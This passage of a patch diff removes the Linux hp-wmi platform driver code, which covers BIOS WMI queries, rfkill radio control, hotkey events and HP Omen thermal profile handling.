+-	union acpi_object *obj = NULL;
+-	struct bios_args *args = NULL;
+-	int mid, actual_insize, actual_outsize;
+-	size_t bios_args_size;
+-	int ret;
+-
+-	mid = encode_outsize_for_pvsz(outsize);
+-	if (WARN_ON(mid < 0))
+-		return mid;
+-
+-	actual_insize = max(insize, 128);
+-	bios_args_size = struct_size(args, data, actual_insize);
+-	args = kmalloc(bios_args_size, GFP_KERNEL);
+-	if (!args)
+-		return -ENOMEM;
+-
+-	input.length = bios_args_size;
+-	input.pointer = args;
+-
+-	args->signature = 0x55434553;
+-	args->command = command;
+-	args->commandtype = query;
+-	args->datasize = insize;
+-	memcpy(args->data, buffer, flex_array_size(args, data, insize));
+-
+-	ret = wmi_evaluate_method(HPWMI_BIOS_GUID, 0, mid, &input, &output);
+-	if (ret)
+-		goto out_free;
+-
+-	obj = output.pointer;
+-	if (!obj) {
+-		ret = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	if (obj->type != ACPI_TYPE_BUFFER) {
+-		pr_warn("query 0x%x returned an invalid object 0x%x\n", query, ret);
+-		ret = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	bios_return = (struct bios_return *)obj->buffer.pointer;
+-	ret = bios_return->return_code;
+-
+-	if (ret) {
+-		if (ret != HPWMI_RET_UNKNOWN_COMMAND &&
+-		    ret != HPWMI_RET_UNKNOWN_CMDTYPE)
+-			pr_warn("query 0x%x returned error 0x%x\n", query, ret);
+-		goto out_free;
+-	}
+-
+-	/* Ignore output data of zero size */
+-	if (!outsize)
+-		goto out_free;
+-
+-	actual_outsize = min(outsize, (int)(obj->buffer.length - sizeof(*bios_return)));
+-	memcpy(buffer, obj->buffer.pointer + sizeof(*bios_return), actual_outsize);
+-	memset(buffer + actual_outsize, 0, outsize - actual_outsize);
+-
+-out_free:
+-	kfree(obj);
+-	kfree(args);
+-	return ret;
+-}
+-
+-static int hp_wmi_get_fan_speed(int fan)
+-{
+-	u8 fsh, fsl;
+-	char fan_data[4] = { fan, 0, 0, 0 };
+-
+-	int ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_GET_QUERY, HPWMI_GM,
+-				       &fan_data, sizeof(char),
+-				       sizeof(fan_data));
+-
+-	if (ret != 0)
+-		return -EINVAL;
+-
+-	fsh = fan_data[2];
+-	fsl = fan_data[3];
+-
+-	return (fsh << 8) | fsl;
+-}
+-
+-static int hp_wmi_read_int(int query)
+-{
+-	int val = 0, ret;
+-
+-	ret = hp_wmi_perform_query(query, HPWMI_READ, &val,
+-				   zero_if_sup(val), sizeof(val));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return val;
+-}
+-
+-static int hp_wmi_get_dock_state(void)
+-{
+-	int state = hp_wmi_read_int(HPWMI_HARDWARE_QUERY);
+-
+-	if (state < 0)
+-		return state;
+-
+-	return !!(state & HPWMI_DOCK_MASK);
+-}
+-
+-static int hp_wmi_get_tablet_mode(void)
+-{
+-	char system_device_mode[4] = { 0 };
+-	const char *chassis_type;
+-	bool tablet_found;
+-	int ret;
+-
+-	chassis_type = dmi_get_system_info(DMI_CHASSIS_TYPE);
+-	if (!chassis_type)
+-		return -ENODEV;
+-
+-	tablet_found = match_string(tablet_chassis_types,
+-				    ARRAY_SIZE(tablet_chassis_types),
+-				    chassis_type) >= 0;
+-	if (!tablet_found)
+-		return -ENODEV;
+-
+-	ret = hp_wmi_perform_query(HPWMI_SYSTEM_DEVICE_MODE, HPWMI_READ,
+-				   system_device_mode, zero_if_sup(system_device_mode),
+-				   sizeof(system_device_mode));
+-	if (ret < 0)
+-		return ret;
+-
+-	return system_device_mode[0] == DEVICE_MODE_TABLET;
+-}
+-
+-static int omen_thermal_profile_set(int mode)
+-{
+-	char buffer[2] = {0, mode};
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_SET_PERFORMANCE_MODE, HPWMI_GM,
+-				   &buffer, sizeof(buffer), 0);
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return mode;
+-}
+-
+-static bool is_omen_thermal_profile(void)
+-{
+-	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
+-
+-	if (!board_name)
+-		return false;
+-
+-	return match_string(omen_thermal_profile_boards,
+-			    ARRAY_SIZE(omen_thermal_profile_boards),
+-			    board_name) >= 0;
+-}
+-
+-static int omen_get_thermal_policy_version(void)
+-{
+-	unsigned char buffer[8] = { 0 };
+-	int ret;
+-
+-	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
+-
+-	if (board_name) {
+-		int matches = match_string(omen_thermal_profile_force_v0_boards,
+-			ARRAY_SIZE(omen_thermal_profile_force_v0_boards),
+-			board_name);
+-		if (matches >= 0)
+-			return 0;
+-	}
+-
+-	ret = hp_wmi_perform_query(HPWMI_GET_SYSTEM_DESIGN_DATA, HPWMI_GM,
+-				   &buffer, sizeof(buffer), sizeof(buffer));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return buffer[3];
+-}
+-
+-static int omen_thermal_profile_get(void)
+-{
+-	u8 data;
+-
+-	int ret = ec_read(HP_OMEN_EC_THERMAL_PROFILE_OFFSET, &data);
+-
+-	if (ret)
+-		return ret;
+-
+-	return data;
+-}
+-
+-static int hp_wmi_fan_speed_max_set(int enabled)
+-{
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_SET_QUERY, HPWMI_GM,
+-				   &enabled, sizeof(enabled), 0);
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return enabled;
+-}
+-
+-static int hp_wmi_fan_speed_max_get(void)
+-{
+-	int val = 0, ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_GET_QUERY, HPWMI_GM,
+-				   &val, zero_if_sup(val), sizeof(val));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return val;
+-}
+-
+-static int __init hp_wmi_bios_2008_later(void)
+-{
+-	int state = 0;
+-	int ret = hp_wmi_perform_query(HPWMI_FEATURE_QUERY, HPWMI_READ, &state,
+-				       zero_if_sup(state), sizeof(state));
+-	if (!ret)
+-		return 1;
+-
+-	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
+-}
+-
+-static int __init hp_wmi_bios_2009_later(void)
+-{
+-	u8 state[128];
+-	int ret = hp_wmi_perform_query(HPWMI_FEATURE2_QUERY, HPWMI_READ, &state,
+-				       zero_if_sup(state), sizeof(state));
+-	if (!ret)
+-		return 1;
+-
+-	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
+-}
+-
+-static int __init hp_wmi_enable_hotkeys(void)
+-{
+-	int value = 0x6e;
+-	int ret = hp_wmi_perform_query(HPWMI_BIOS_QUERY, HPWMI_WRITE, &value,
+-				       sizeof(value), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static int hp_wmi_set_block(void *data, bool blocked)
+-{
+-	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
+-	int query = BIT(r + 8) | ((!blocked) << r);
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE,
+-				   &query, sizeof(query), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static const struct rfkill_ops hp_wmi_rfkill_ops = {
+-	.set_block = hp_wmi_set_block,
+-};
+-
+-static bool hp_wmi_get_sw_state(enum hp_wmi_radio r)
+-{
+-	int mask = 0x200 << (r * 8);
+-
+-	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-
+-	/* TBD: Pass error */
+-	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
+-
+-	return !(wireless & mask);
+-}
+-
+-static bool hp_wmi_get_hw_state(enum hp_wmi_radio r)
+-{
+-	int mask = 0x800 << (r * 8);
+-
+-	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-
+-	/* TBD: Pass error */
+-	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
+-
+-	return !(wireless & mask);
+-}
+-
+-static int hp_wmi_rfkill2_set_block(void *data, bool blocked)
+-{
+-	int rfkill_id = (int)(long)data;
+-	char buffer[4] = { 0x01, 0x00, rfkill_id, !blocked };
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_WRITE,
+-				   buffer, sizeof(buffer), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static const struct rfkill_ops hp_wmi_rfkill2_ops = {
+-	.set_block = hp_wmi_rfkill2_set_block,
+-};
+-
+-static int hp_wmi_rfkill2_refresh(void)
+-{
+-	struct bios_rfkill2_state state;
+-	int err, i;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
+-				   zero_if_sup(state), sizeof(state));
+-	if (err)
+-		return err;
+-
+-	for (i = 0; i < rfkill2_count; i++) {
+-		int num = rfkill2[i].num;
+-		struct bios_rfkill2_device_state *devstate;
+-
+-		devstate = &state.device[num];
+-
+-		if (num >= state.count ||
+-		    devstate->rfkill_id != rfkill2[i].id) {
+-			pr_warn("power configuration of the wireless devices unexpectedly changed\n");
+-			continue;
+-		}
+-
+-		rfkill_set_states(rfkill2[i].rfkill,
+-				  IS_SWBLOCKED(devstate->power),
+-				  IS_HWBLOCKED(devstate->power));
+-	}
+-
+-	return 0;
+-}
+-
+-static ssize_t display_show(struct device *dev, struct device_attribute *attr,
+-			    char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_DISPLAY_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t hddtemp_show(struct device *dev, struct device_attribute *attr,
+-			    char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_HDDTEMP_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t als_show(struct device *dev, struct device_attribute *attr,
+-			char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_ALS_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t dock_show(struct device *dev, struct device_attribute *attr,
+-			 char *buf)
+-{
+-	int value = hp_wmi_get_dock_state();
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t tablet_show(struct device *dev, struct device_attribute *attr,
+-			   char *buf)
+-{
+-	int value = hp_wmi_get_tablet_mode();
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t postcode_show(struct device *dev, struct device_attribute *attr,
+-			     char *buf)
+-{
+-	/* Get the POST error code of previous boot failure. */
+-	int value = hp_wmi_read_int(HPWMI_POSTCODEERROR_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "0x%x\n", value);
+-}
+-
+-static ssize_t als_store(struct device *dev, struct device_attribute *attr,
+-			 const char *buf, size_t count)
+-{
+-	u32 tmp;
+-	int ret;
+-
+-	ret = kstrtou32(buf, 10, &tmp);
+-	if (ret)
+-		return ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_ALS_QUERY, HPWMI_WRITE, &tmp,
+-				       sizeof(tmp), 0);
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return count;
+-}
+-
+-static ssize_t postcode_store(struct device *dev, struct device_attribute *attr,
+-			      const char *buf, size_t count)
+-{
+-	u32 tmp = 1;
+-	bool clear;
+-	int ret;
+-
+-	ret = kstrtobool(buf, &clear);
+-	if (ret)
+-		return ret;
+-
+-	if (clear == false)
+-		return -EINVAL;
+-
+-	/* Clear the POST error code. It is kept until cleared. */
+-	ret = hp_wmi_perform_query(HPWMI_POSTCODEERROR_QUERY, HPWMI_WRITE, &tmp,
+-				       sizeof(tmp), 0);
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return count;
+-}
+-
+-static DEVICE_ATTR_RO(display);
+-static DEVICE_ATTR_RO(hddtemp);
+-static DEVICE_ATTR_RW(als);
+-static DEVICE_ATTR_RO(dock);
+-static DEVICE_ATTR_RO(tablet);
+-static DEVICE_ATTR_RW(postcode);
+-
+-static struct attribute *hp_wmi_attrs[] = {
+-	&dev_attr_display.attr,
+-	&dev_attr_hddtemp.attr,
+-	&dev_attr_als.attr,
+-	&dev_attr_dock.attr,
+-	&dev_attr_tablet.attr,
+-	&dev_attr_postcode.attr,
+-	NULL,
+-};
+-ATTRIBUTE_GROUPS(hp_wmi);
+-
+-static void hp_wmi_notify(u32 value, void *context)
+-{
+-	struct acpi_buffer response = { ACPI_ALLOCATE_BUFFER, NULL };
+-	u32 event_id, event_data;
+-	union acpi_object *obj;
+-	acpi_status status;
+-	u32 *location;
+-	int key_code;
+-
+-	status = wmi_get_event_data(value, &response);
+-	if (status != AE_OK) {
+-		pr_info("bad event status 0x%x\n", status);
+-		return;
+-	}
+-
+-	obj = (union acpi_object *)response.pointer;
+-
+-	if (!obj)
+-		return;
+-	if (obj->type != ACPI_TYPE_BUFFER) {
+-		pr_info("Unknown response received %d\n", obj->type);
+-		kfree(obj);
+-		return;
+-	}
+-
+-	/*
+-	 * Depending on ACPI version the concatenation of id and event data
+-	 * inside _WED function will result in a 8 or 16 byte buffer.
+-	 */
+-	location = (u32 *)obj->buffer.pointer;
+-	if (obj->buffer.length == 8) {
+-		event_id = *location;
+-		event_data = *(location + 1);
+-	} else if (obj->buffer.length == 16) {
+-		event_id = *location;
+-		event_data = *(location + 2);
+-	} else {
+-		pr_info("Unknown buffer length %d\n", obj->buffer.length);
+-		kfree(obj);
+-		return;
+-	}
+-	kfree(obj);
+-
+-	switch (event_id) {
+-	case HPWMI_DOCK_EVENT:
+-		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_DOCK,
+-					    hp_wmi_get_dock_state());
+-		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
+-					    hp_wmi_get_tablet_mode());
+-		input_sync(hp_wmi_input_dev);
+-		break;
+-	case HPWMI_PARK_HDD:
+-		break;
+-	case HPWMI_SMART_ADAPTER:
+-		break;
+-	case HPWMI_BEZEL_BUTTON:
+-	case HPWMI_OMEN_KEY:
+-		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
+-		if (key_code < 0)
+-			break;
+-
+-		if (!sparse_keymap_report_event(hp_wmi_input_dev,
+-						key_code, 1, true))
+-			pr_info("Unknown key code - 0x%x\n", key_code);
+-		break;
+-	case HPWMI_WIRELESS:
+-		if (rfkill2_count) {
+-			hp_wmi_rfkill2_refresh();
+-			break;
+-		}
+-
+-		if (wifi_rfkill)
+-			rfkill_set_states(wifi_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_WIFI),
+-					  hp_wmi_get_hw_state(HPWMI_WIFI));
+-		if (bluetooth_rfkill)
+-			rfkill_set_states(bluetooth_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
+-					  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-		if (wwan_rfkill)
+-			rfkill_set_states(wwan_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_WWAN),
+-					  hp_wmi_get_hw_state(HPWMI_WWAN));
+-		break;
+-	case HPWMI_CPU_BATTERY_THROTTLE:
+-		pr_info("Unimplemented CPU throttle because of 3 Cell battery event detected\n");
+-		break;
+-	case HPWMI_LOCK_SWITCH:
+-		break;
+-	case HPWMI_LID_SWITCH:
+-		break;
+-	case HPWMI_SCREEN_ROTATION:
+-		break;
+-	case HPWMI_COOLSENSE_SYSTEM_MOBILE:
+-		break;
+-	case HPWMI_COOLSENSE_SYSTEM_HOT:
+-		break;
+-	case HPWMI_PROXIMITY_SENSOR:
+-		break;
+-	case HPWMI_BACKLIT_KB_BRIGHTNESS:
+-		break;
+-	case HPWMI_PEAKSHIFT_PERIOD:
+-		break;
+-	case HPWMI_BATTERY_CHARGE_PERIOD:
+-		break;
+-	case HPWMI_SANITIZATION_MODE:
+-		break;
+-	case HPWMI_SMART_EXPERIENCE_APP:
+-		break;
+-	default:
+-		pr_info("Unknown event_id - %d - 0x%x\n", event_id, event_data);
+-		break;
+-	}
+-}
+-
+-static int __init hp_wmi_input_setup(void)
+-{
+-	acpi_status status;
+-	int err, val;
+-
+-	hp_wmi_input_dev = input_allocate_device();
+-	if (!hp_wmi_input_dev)
+-		return -ENOMEM;
+-
+-	hp_wmi_input_dev->name = "HP WMI hotkeys";
+-	hp_wmi_input_dev->phys = "wmi/input0";
+-	hp_wmi_input_dev->id.bustype = BUS_HOST;
+-
+-	__set_bit(EV_SW, hp_wmi_input_dev->evbit);
+-
+-	/* Dock */
+-	val = hp_wmi_get_dock_state();
+-	if (!(val < 0)) {
+-		__set_bit(SW_DOCK, hp_wmi_input_dev->swbit);
+-		input_report_switch(hp_wmi_input_dev, SW_DOCK, val);
+-	}
+-
+-	/* Tablet mode */
+-	val = hp_wmi_get_tablet_mode();
+-	if (!(val < 0)) {
+-		__set_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit);
+-		input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE, val);
+-	}
+-
+-	err = sparse_keymap_setup(hp_wmi_input_dev, hp_wmi_keymap, NULL);
+-	if (err)
+-		goto err_free_dev;
+-
+-	/* Set initial hardware state */
+-	input_sync(hp_wmi_input_dev);
+-
+-	if (!hp_wmi_bios_2009_later() && hp_wmi_bios_2008_later())
+-		hp_wmi_enable_hotkeys();
+-
+-	status = wmi_install_notify_handler(HPWMI_EVENT_GUID, hp_wmi_notify, NULL);
+-	if (ACPI_FAILURE(status)) {
+-		err = -EIO;
+-		goto err_free_dev;
+-	}
+-
+-	err = input_register_device(hp_wmi_input_dev);
+-	if (err)
+-		goto err_uninstall_notifier;
+-
+-	return 0;
+-
+- err_uninstall_notifier:
+-	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
+- err_free_dev:
+-	input_free_device(hp_wmi_input_dev);
+-	return err;
+-}
+-
+-static void hp_wmi_input_destroy(void)
+-{
+-	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
+-	input_unregister_device(hp_wmi_input_dev);
+-}
+-
+-static int __init hp_wmi_rfkill_setup(struct platform_device *device)
+-{
+-	int err, wireless;
+-
+-	wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-	if (wireless < 0)
+-		return wireless;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE, &wireless,
+-				   sizeof(wireless), 0);
+-	if (err)
+-		return err;
+-
+-	if (wireless & 0x1) {
+-		wifi_rfkill = rfkill_alloc("hp-wifi", &device->dev,
+-					   RFKILL_TYPE_WLAN,
+-					   &hp_wmi_rfkill_ops,
+-					   (void *) HPWMI_WIFI);
+-		if (!wifi_rfkill)
+-			return -ENOMEM;
+-		rfkill_init_sw_state(wifi_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_WIFI));
+-		rfkill_set_hw_state(wifi_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_WIFI));
+-		err = rfkill_register(wifi_rfkill);
+-		if (err)
+-			goto register_wifi_error;
+-	}
+-
+-	if (wireless & 0x2) {
+-		bluetooth_rfkill = rfkill_alloc("hp-bluetooth", &device->dev,
+-						RFKILL_TYPE_BLUETOOTH,
+-						&hp_wmi_rfkill_ops,
+-						(void *) HPWMI_BLUETOOTH);
+-		if (!bluetooth_rfkill) {
+-			err = -ENOMEM;
+-			goto register_bluetooth_error;
+-		}
+-		rfkill_init_sw_state(bluetooth_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_BLUETOOTH));
+-		rfkill_set_hw_state(bluetooth_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-		err = rfkill_register(bluetooth_rfkill);
+-		if (err)
+-			goto register_bluetooth_error;
+-	}
+-
+-	if (wireless & 0x4) {
+-		wwan_rfkill = rfkill_alloc("hp-wwan", &device->dev,
+-					   RFKILL_TYPE_WWAN,
+-					   &hp_wmi_rfkill_ops,
+-					   (void *) HPWMI_WWAN);
+-		if (!wwan_rfkill) {
+-			err = -ENOMEM;
+-			goto register_wwan_error;
+-		}
+-		rfkill_init_sw_state(wwan_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_WWAN));
+-		rfkill_set_hw_state(wwan_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_WWAN));
+-		err = rfkill_register(wwan_rfkill);
+-		if (err)
+-			goto register_wwan_error;
+-	}
+-
+-	return 0;
+-
+-register_wwan_error:
+-	rfkill_destroy(wwan_rfkill);
+-	wwan_rfkill = NULL;
+-	if (bluetooth_rfkill)
+-		rfkill_unregister(bluetooth_rfkill);
+-register_bluetooth_error:
+-	rfkill_destroy(bluetooth_rfkill);
+-	bluetooth_rfkill = NULL;
+-	if (wifi_rfkill)
+-		rfkill_unregister(wifi_rfkill);
+-register_wifi_error:
+-	rfkill_destroy(wifi_rfkill);
+-	wifi_rfkill = NULL;
+-	return err;
+-}
+-
+-static int __init hp_wmi_rfkill2_setup(struct platform_device *device)
+-{
+-	struct bios_rfkill2_state state;
+-	int err, i;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
+-				   zero_if_sup(state), sizeof(state));
+-	if (err)
+-		return err < 0 ? err : -EINVAL;
+-
+-	if (state.count > HPWMI_MAX_RFKILL2_DEVICES) {
+-		pr_warn("unable to parse 0x1b query output\n");
+-		return -EINVAL;
+-	}
+-
+-	for (i = 0; i < state.count; i++) {
+-		struct rfkill *rfkill;
+-		enum rfkill_type type;
+-		char *name;
+-
+-		switch (state.device[i].radio_type) {
+-		case HPWMI_WIFI:
+-			type = RFKILL_TYPE_WLAN;
+-			name = "hp-wifi";
+-			break;
+-		case HPWMI_BLUETOOTH:
+-			type = RFKILL_TYPE_BLUETOOTH;
+-			name = "hp-bluetooth";
+-			break;
+-		case HPWMI_WWAN:
+-			type = RFKILL_TYPE_WWAN;
+-			name = "hp-wwan";
+-			break;
+-		case HPWMI_GPS:
+-			type = RFKILL_TYPE_GPS;
+-			name = "hp-gps";
+-			break;
+-		default:
+-			pr_warn("unknown device type 0x%x\n",
+-				state.device[i].radio_type);
+-			continue;
+-		}
+-
+-		if (!state.device[i].vendor_id) {
+-			pr_warn("zero device %d while %d reported\n",
+-				i, state.count);
+-			continue;
+-		}
+-
+-		rfkill = rfkill_alloc(name, &device->dev, type,
+-				      &hp_wmi_rfkill2_ops, (void *)(long)i);
+-		if (!rfkill) {
+-			err = -ENOMEM;
+-			goto fail;
+-		}
+-
+-		rfkill2[rfkill2_count].id = state.device[i].rfkill_id;
+-		rfkill2[rfkill2_count].num = i;
+-		rfkill2[rfkill2_count].rfkill = rfkill;
+-
+-		rfkill_init_sw_state(rfkill,
+-				     IS_SWBLOCKED(state.device[i].power));
+-		rfkill_set_hw_state(rfkill,
+-				    IS_HWBLOCKED(state.device[i].power));
+-
+-		if (!(state.device[i].power & HPWMI_POWER_BIOS))
+-			pr_info("device %s blocked by BIOS\n", name);
+-
+-		err = rfkill_register(rfkill);
+-		if (err) {
+-			rfkill_destroy(rfkill);
+-			goto fail;
+-		}
+-
+-		rfkill2_count++;
+-	}
+-
+-	return 0;
+-fail:
+-	for (; rfkill2_count > 0; rfkill2_count--) {
+-		rfkill_unregister(rfkill2[rfkill2_count - 1].rfkill);
+-		rfkill_destroy(rfkill2[rfkill2_count - 1].rfkill);
+-	}
+-	return err;
+-}
+-
+-static int platform_profile_omen_get(struct platform_profile_handler *pprof,
+-				     enum platform_profile_option *profile)
+-{
+-	int tp;
+-
+-	tp = omen_thermal_profile_get();
+-	if (tp < 0)
+-		return tp;
+-
+-	switch (tp) {
+-	case HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE:
+-	case HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE:
+-		*profile = PLATFORM_PROFILE_PERFORMANCE;
+-		break;
+-	case HP_OMEN_V0_THERMAL_PROFILE_DEFAULT:
+-	case HP_OMEN_V1_THERMAL_PROFILE_DEFAULT:
+-		*profile = PLATFORM_PROFILE_BALANCED;
+-		break;
+-	case HP_OMEN_V0_THERMAL_PROFILE_COOL:
+-	case HP_OMEN_V1_THERMAL_PROFILE_COOL:
+-		*profile = PLATFORM_PROFILE_COOL;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int platform_profile_omen_set(struct platform_profile_handler *pprof,
+-				     enum platform_profile_option profile)
+-{
+-	int err, tp, tp_version;
+-
+-	tp_version = omen_get_thermal_policy_version();
+-
+-	if (tp_version < 0 || tp_version > 1)
+-		return -EOPNOTSUPP;
+-
+-	switch (profile) {
+-	case PLATFORM_PROFILE_PERFORMANCE:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE;
+-		break;
+-	case PLATFORM_PROFILE_BALANCED:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_DEFAULT;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_DEFAULT;
+-		break;
+-	case PLATFORM_PROFILE_COOL:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_COOL;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_COOL;
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = omen_thermal_profile_set(tp);
+-	if (err < 0)
+-		return err;
+-
+-	return 0;
+-}
+-
+-static int thermal_profile_get(void)
+-{
+-	return hp_wmi_read_int(HPWMI_THERMAL_PROFILE_QUERY);
+-}
+-
+-static int thermal_profile_set(int thermal_profile)
+-{
+-	return hp_wmi_perform_query(HPWMI_THERMAL_PROFILE_QUERY, HPWMI_WRITE, &thermal_profile,
+-							   sizeof(thermal_profile), 0);
+-}
+-
+-static int hp_wmi_platform_profile_get(struct platform_profile_handler *pprof,
+-					enum platform_profile_option *profile)
+-{
+-	int tp;
+-
+-	tp = thermal_profile_get();
+-	if (tp < 0)
+-		return tp;
+-
+-	switch (tp) {
+-	case HP_THERMAL_PROFILE_PERFORMANCE:
+-		*profile =  PLATFORM_PROFILE_PERFORMANCE;
+-		break;
+-	case HP_THERMAL_PROFILE_DEFAULT:
+-		*profile =  PLATFORM_PROFILE_BALANCED;
+-		break;
+-	case HP_THERMAL_PROFILE_COOL:
+-		*profile =  PLATFORM_PROFILE_COOL;
+-		break;
+-	case HP_THERMAL_PROFILE_QUIET:
+-		*profile = PLATFORM_PROFILE_QUIET;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_platform_profile_set(struct platform_profile_handler *pprof,
+-					enum platform_profile_option profile)
+-{
+-	int err, tp;
+-
+-	switch (profile) {
+-	case PLATFORM_PROFILE_PERFORMANCE:
+-		tp =  HP_THERMAL_PROFILE_PERFORMANCE;
+-		break;
+-	case PLATFORM_PROFILE_BALANCED:
+-		tp =  HP_THERMAL_PROFILE_DEFAULT;
+-		break;
+-	case PLATFORM_PROFILE_COOL:
+-		tp =  HP_THERMAL_PROFILE_COOL;
+-		break;
+-	case PLATFORM_PROFILE_QUIET:
+-		tp = HP_THERMAL_PROFILE_QUIET;
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = thermal_profile_set(tp);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-
+-static int thermal_profile_setup(void)
+-{
+-	int err, tp;
+-
+-	if (is_omen_thermal_profile()) {
+-		tp = omen_thermal_profile_get();
+-		if (tp < 0)
+-			return tp;
+-
+-		/*
+-		 * call thermal profile write command to ensure that the
+-		 * firmware correctly sets the OEM variables
+-		 */
+-
+-		err = omen_thermal_profile_set(tp);
+-		if (err < 0)
+-			return err;
+-
+-		platform_profile_handler.profile_get = platform_profile_omen_get;
+-		platform_profile_handler.profile_set = platform_profile_omen_set;
+-	} else {
+-		tp = thermal_profile_get();
+-
+-		if (tp < 0)
+-			return tp;
+-
+-		/*
+-		 * call thermal profile write command to ensure that the
+-		 * firmware correctly sets the OEM variables for the DPTF
+-		 */
+-		err = thermal_profile_set(tp);
+-		if (err)
+-			return err;
+-
+-		platform_profile_handler.profile_get = hp_wmi_platform_profile_get;
+-		platform_profile_handler.profile_set = hp_wmi_platform_profile_set;
+-
+-		set_bit(PLATFORM_PROFILE_QUIET, platform_profile_handler.choices);
+-	}
+-
+-	set_bit(PLATFORM_PROFILE_COOL, platform_profile_handler.choices);
+-	set_bit(PLATFORM_PROFILE_BALANCED, platform_profile_handler.choices);
+-	set_bit(PLATFORM_PROFILE_PERFORMANCE, platform_profile_handler.choices);
+-
+-	err = platform_profile_register(&platform_profile_handler);
+-	if (err)
+-		return err;
+-
+-	platform_profile_support = true;
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_hwmon_init(void);
+-
+-static int __init hp_wmi_bios_setup(struct platform_device *device)
+-{
+-	int err;
+-	/* clear detected rfkill devices */
+-	wifi_rfkill = NULL;
+-	bluetooth_rfkill = NULL;
+-	wwan_rfkill = NULL;
+-	rfkill2_count = 0;
+-
+-	/*
+-	 * In pre-2009 BIOS, command 1Bh return 0x4 to indicate that
+-	 * BIOS no longer controls the power for the wireless
